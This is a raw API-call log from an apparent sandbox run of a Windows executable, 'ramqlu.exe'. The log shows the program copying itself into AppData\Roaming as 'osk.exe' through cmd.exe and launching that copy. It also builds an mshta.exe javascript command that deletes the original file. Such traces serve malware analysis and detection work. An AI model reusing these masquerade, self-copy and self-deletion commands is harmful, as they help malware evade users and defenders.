GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x280004) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.999] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.999] GlobalLock (hMem=0x280004) returned 0x600668 [0057.999] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.999] GlobalUnlock (hMem=0x28000c) returned 0 [0057.999] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.999] GlobalUnlock (hMem=0x280004) returned 0 [0057.999] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0058.000] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0058.072] SHGetPathFromIDListW (in: pidl=0x5feb68, pszPath=0x611fdc | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] IMalloc:Free (This=0x767666bc, pv=0x5feb68) [0058.074] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0058.074] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0058.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1da98b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧佹`\x18") returned 7 [0058.074] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.078] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.081] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.081] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.081] GlobalUnlock (hMem=0x280004) returned 0 [0058.081] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.081] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.081] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.082] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.082] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.082] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.082] GlobalUnlock (hMem=0x280004) returned 0 [0058.082] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.082] GlobalUnlock (hMem=0x28000c) returned 0 [0058.083] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0058.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1732, cFileName="osk.exe", cAlternateFileName="")) returned 0x607ed8 [0058.083] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0058.083] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0058.083] FindClose (in: hFindFile=0x607ed8 | out: hFindFile=0x607ed8) returned 1 [0058.083] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed1f1500, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1732, cFileName="osk.exe", cAlternateFileName="")) returned 0x607ed8 [0058.083] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0058.084] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0058.084] FindClose (in: hFindFile=0x607ed8 | out: hFindFile=0x607ed8) returned 1 [0058.084] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 1 [0058.087] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fc14, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0058.088] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.088] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.088] GlobalUnlock (hMem=0x28000c) returned 0 [0058.088] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.088] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.088] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.088] GlobalUnlock (hMem=0x28000c) returned 0 [0058.088] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.088] GlobalUnlock (hMem=0x280004) returned 0 [0058.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d9a708, cbMultiByte=18, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="/c copy /y \"@\" \"#\"\x18\x18㩘^") returned 18 [0058.088] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"@\" \"#\"", len=0x12 | out: pbstr=0x18fdc0*="/c copy /y \"@\" \"#\"") returned 1 [0058.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"@\" \"#\"", cchWideChar=18, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 18 [0058.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\" \"#\"", cchWideChar=5, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\" \"#\"py /y \"@\" \"#\"\x18", lpUsedDefaultChar=0x0) returned 5 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe14*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"@\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] SysReAllocStringLen (in: pbstr=0x18fdc0*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", len=0x41 | out: pbstr=0x18fdc0*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"") returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", cchWideChar=65, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", lpUsedDefaultChar=0x0) returned 65 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\"", cchWideChar=1, lpMultiByteStr=0x18ed8c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed88, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0058.090] SysReAllocStringLen (in: pbstr=0x18fe10*=0x0, psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe10*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0058.090] SysReAllocStringLen (in: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"#\"", psz="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", len=0x75 | out: pbstr=0x18fe1c*="/c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"") returned 1 [0058.090] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.090] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.090] GlobalUnlock (hMem=0x280004) returned 0 [0058.090] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.090] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.090] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.090] GlobalUnlock (hMem=0x280004) returned 0 [0058.090] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.090] GlobalUnlock (hMem=0x28000c) returned 0 [0058.090] GetEnvironmentVariableA (in: lpName="COMSPEC", lpBuffer=0x18f9cc, nSize=0x400 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.090] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d62b38, cbMultiByte=27, lpWideCharStr=0x18edcc, cchWideChar=2047 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe^矆»") returned 27 [0058.091] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18fd90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fd80 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"", lpProcessInformation=0x18fd80*(hProcess=0xe8, hThread=0xe4, dwProcessId=0x7d4, dwThreadId=0x40c)) returned 1 [0058.119] WaitForSingleObject (hHandle=0xe8, dwMilliseconds=0xffffffff) returned 0x0 [0058.323] CloseHandle (hObject=0xe8) returned 1 [0058.323] CloseHandle (hObject=0xe4) returned 1 [0058.323] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fb80 | out: lpFindFileData=0x18fb80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="osk.exe", cAlternateFileName="")) returned 0x60ae90 [0058.323] FileTimeToLocalFileTime (in: lpFileTime=0x18fb94, lpLocalFileTime=0x18fb14 | out: lpLocalFileTime=0x18fb14) returned 1 [0058.323] FileTimeToDosDateTime (in: lpFileTime=0x18fb14, lpFatDate=0x18fb62, lpFatTime=0x18fb60 | out: lpFatDate=0x18fb62, lpFatTime=0x18fb60) returned 1 [0058.323] FindClose (in: hFindFile=0x60ae90 | out: hFindFile=0x60ae90) returned 1 [0058.324] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.325] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" runas" [0058.325] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.325] GlobalUnlock (hMem=0x28000c) returned 0 [0058.325] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0058.325] GlobalLock (hMem=0x280004) returned 0x6163c0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0058.325] GlobalUnlock (hMem=0x28000c) returned 0 [0058.325] GlobalHandle (pMem=0x6163c0) returned 0x280004 [0058.325] GlobalUnlock (hMem=0x280004) returned 0 [0058.325] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.325] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.325] GlobalUnlock (hMem=0x280004) returned 0 [0058.325] GlobalLock (hMem=0x280004) returned 0x5ff0f0 [0058.326] GlobalLock (hMem=0x28000c) returned 0x6163c0 [0058.326] GlobalHandle (pMem=0x5ff0f0) returned 0x280004 [0058.326] GlobalUnlock (hMem=0x280004) returned 0 [0058.326] GlobalHandle (pMem=0x6163c0) returned 0x28000c [0058.326] GlobalUnlock (hMem=0x28000c) returned 0 [0058.326] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d9a708, cbMultiByte=16, lpWideCharStr=0x18ee1c, cchWideChar=2047 | out: lpWideCharStr=":Zone.Identifier") returned 16 [0058.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe:Zone.Identifier", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x678dde1e, ftCreationTime.dwLowDateTime=0x5e00c4, ftCreationTime.dwHighDateTime=0x5e3a58, ftLastAccessTime.dwLowDateTime=0x96b1489b, ftLastAccessTime.dwHighDateTime=0x5e0000, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x5e3a58, dwReserved0=0x766ae7d9, dwReserved1=0xbf0657be, cFileName="䢛隱ޅ", cAlternateFileName="䱈@佶`伔`企@﹘\x18㨜_﹠\x18")) returned 0xffffffff [0058.326] GetLastError () returned 0x7b [0058.326] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0059.439] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb74, nSize=0x20a | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0059.439] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0059.439] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0059.439] GlobalUnlock (hMem=0x28000c) returned 0 [0059.439] GlobalLock (hMem=0x28000c) returned 0x5ff0f0 [0059.439] GlobalLock (hMem=0x280004) returned 0x646dc8 [0059.439] GlobalHandle (pMem=0x5ff0f0) returned 0x28000c [0059.440] GlobalUnlock (hMem=0x28000c) returned 0 [0059.440] GlobalHandle (pMem=0x646dc8) returned 0x280004 [0059.440] GlobalUnlock (hMem=0x280004) returned 0 [0059.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d79198, cbMultiByte=142, lpWideCharStr=0x18ed7c, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"pData\\Roaming\\osk.exe") returned 142 [0059.440] SysReAllocStringLen (in: pbstr=0x18fd70*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fd70*="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"") returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=142, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 142 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=99, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 99 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", cchWideChar=72, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 72 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@!);close()}catch(e){}},10);\"", cchWideChar=29, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@!);close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 29 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");close()}catch(e){}},10);\"", cchWideChar=27, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");close()}catch(e){}},10);\";\"o.DeleteFile(!@!);close()}catch(e){}},10);\");close()}catch(e){}},10);\"o.DeleteFile(!@!);close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 27 [0059.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fdb8*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fdb8*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{o.DeleteFile(!@!);close()}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fd70*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", len=0x8e | out: pbstr=0x18fd70*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"") returned 1 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", cchWideChar=142, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 142 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="');close()}catch(e){}},10);\"", cchWideChar=28, lpMultiByteStr=0x18ed3c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="');close()}catch(e){}},10);\"ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"c", lpUsedDefaultChar=0x0) returned 28 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0059.442] 